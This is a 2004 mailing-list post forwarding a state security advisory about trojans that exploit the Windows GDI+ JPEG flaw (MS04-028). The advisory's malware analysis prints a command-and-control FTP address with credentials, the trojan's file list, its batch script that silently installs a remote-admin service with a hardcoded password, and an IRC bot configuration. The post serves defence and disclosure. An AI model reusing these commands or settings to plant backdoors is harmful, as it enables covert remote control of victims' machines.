[Oremem] SECURITY ADVISORY: New Windows threat confirmed

Phillip Barker BarkerP at co.curry.or.us
Tue Sep 28 19:11:40 EDT 2004 

Hello Gary,

I just received this warning from the State of Oregon network security
office.
I thought you'd want to see this warning. Apparently the theoretical threat
from last week has now being used actively by hackers. If you have 
Admin rights on your laptop please be sure to verify it's patched to the 
current versions!

This looks pretty nasty!

Cheers,
Phil

####


ADVISORY NUMBER:  ORA04-057 

DATE ISSUED:  Tuesday, September 28, 2004 

STATE OF OREGON ENTERPRISE SECURITY OFFICE ADVISORY 

SUBJECT:  Microsoft GDI+ JPEG Processing Exploitation 

DESCRIPTION: 
ZDNET News recently posted an article titled "Trojan horse exploits image
flaw".  Easynews, mentioned in the article, actually identified and analyzed
the JPEGS posted to some usenet alt.binaries.erotica groups.  One JPEG was
posted Sun, 26 Sep 2004 19:19:51 while the other was identified Sun, 26 Sep
2004 20:12:42 MST.

Once this JPEG overflowed GDI+, it connected to the original site, then
connected to an FTP server and downloaded almost 2MB of data.  It then
installs a Trojan that installs itself as a service.  Most popular
anti-virus scanners are able to detect these exploitative JPEG's identifying
them as "Exploit-MS04-028" or "Bloodhound.Exploit.13" (Symantec).

It also installs radmin (radmin.com) running as 'r_server'.  It then
connects to the same IP that is in the USENET post headers.  Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba.  It downloads
these files:

-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll 
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe 
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt 
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll 
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll 
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe 
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log 
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe 
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat 
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx 
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg 
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat 
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log 
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll 
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe 
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe 
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe 
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll 
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll 
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe 
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll 
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg 
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe 
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe 
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe 
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe 

and executes 'execute.bat', which looks like: 

regedit.exe /s radmin.reg 
nvsvc.exe /install /silence 
nvsvc.exe /pass:hardcore /port:10002 /save /silence 
nvsvc.exe /start /silence 
net start r_server 

it also installs an irc client with this config info: 
server1=irc..net 
port1=7777 
login=Darkbro0d 
channel=#FurQ 
password=letmein 
nick1=Track100Mbit 
nick2=Trck100#1 
sfv=1 
user=Trackmaster 
login=darkbro0d 

SYSTEMS AFFECTED:  
This vulnerability affects the following Microsoft Windows operating systems
by default: 

Microsoft Windows XP and Microsoft Windows XP Service Pack 1 
Microsoft Windows XP 64-Bit Edition Service Pack 1 
Microsoft Windows XP 64-Bit Edition Version 2003 
Microsoft Windows Server 2003 
Microsoft Windows Server 2003 64-Bit Edition 

Other Microsoft Windows operating systems, including systems running
Microsoft Windows XP Service Pack 2, are not affected by default. However,
this vulnerability may affect all versions of the Microsoft Windows
operating systems if an application or update installs a vulnerable version
of the gdiplus.dll file onto the system.

Please note that this vulnerability affects any software that uses the
Microsoft Windows operating system or Microsoft's GDI+ library to render
JPEG graphics. Please see Systems Affected section of the vulnerability note
to determine if third-party software is affected. A list of affected
Microsoft products is listed at the end of this advisory. Please see
Microsoft Security Bulletin MS04-028 for the complete list of affected and
non-affected Microsoft products.

RISK:  Severe. 

IMPACT:  By exploiting this vulnerability it is possible for an attacker to
run arbitrary code on target systems. Successful exploitation can be
leveraged to gain complete control over target systems, and may lead to
malware installation, exposure of confidential information, or further
network compromise. To be vulnerable to exploitation, a victim would have to
locally view or preview a malicious JPEG image on a vulnerable platform.

RECOMMENDATIONS: 

Block all outbound connections to 209.171.43.27.  This IP address is
registered to Netfirms Inc and TELUS Communications Inc. of Toronto,
Ontario, Canada. 
Apply patches from Microsoft. Apply the appropriate patches as specified in
Microsoft Security Bulletin MS04-028. Please note that this bulletin
provides several updates to the operating system and various applications
that rely on GDI+ to render JPEG images. Depending on your system's
configuration, you may need to install multiple patches. In addition to
releasing some patches on Windows Update, Microsoft has released some
patches on Office Update, and developer tool patches are available from
MS04-028. 
Apply patches from third-party vendors. Third-party software that relies on
GDI+ to render JPEG images may also need to be updated. Apply the
appropriate patches specified by your vendor. Please see the your vendor's
site and the Systems Affected section of the vulnerability note for more
information. Depending on your system's configuration, you may need install
multiple patches. 
Use caution with email attachments. Never open unexpected email attachments.
Before opening an attachment, save it to a disk and scan it with anti-virus
software. Make sure to turn off the option to automatically download
attachments. 
View email messages in plain text. Email programs like Outlook and Outlook
Express interpret HTML code the same way that Internet Explorer does.
Attackers may be able to take advantage of that by sending malicious
HTML-formatted email messages. 
Maintain updated anti-virus software. It is important that you use
anti-virus software and keep it up to date. Most anti-virus software vendors
frequently release updated information, tools, or virus databases to help
detect and recover from virus infections. Many anti-virus packages support
automatic updates of virus definitions. 
Follow Microsoft recommendations for workarounds if patches cannot be
applied. Microsoft provides several workarounds for this vulnerability. Note
that these workarounds do not remove the vulnerability from the system, and
they will limit functionality. Please consult the "Workarounds for JPEG
Vulnerability - CAN-2004-0200" section of Microsoft Security Bulletin
MS04-028. 

REFERENCES: 
ZDNet News 
http://news.zdnet.com/2100-1009_22-5385995.html 

Microsoft Security Bulletin MS04-028 
http://microsoft.com/technet/security/bulletin/MS04-028.asp 

Microsoft End User Security Bulletin for MS04-028 
http://www.microsoft.com/security/bulletins/200409_jpeg.mspx 

US-CERT Vulnerability Note VU#297462 
http://www.kb.cert.org/vuls/id/297462 

Microsoft KB Article 873374 
http://support.microsoft.com/?id=873374 

CVE CAN-2004-0200 
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0200 



Phil Barker
Curry County 
Computer Services
Communication and Technical Support Manager
Gold Beach, Oregon 97444
541.247.3370 Desk
541.253.7550 Cellphone

More information about the Oremem mailing list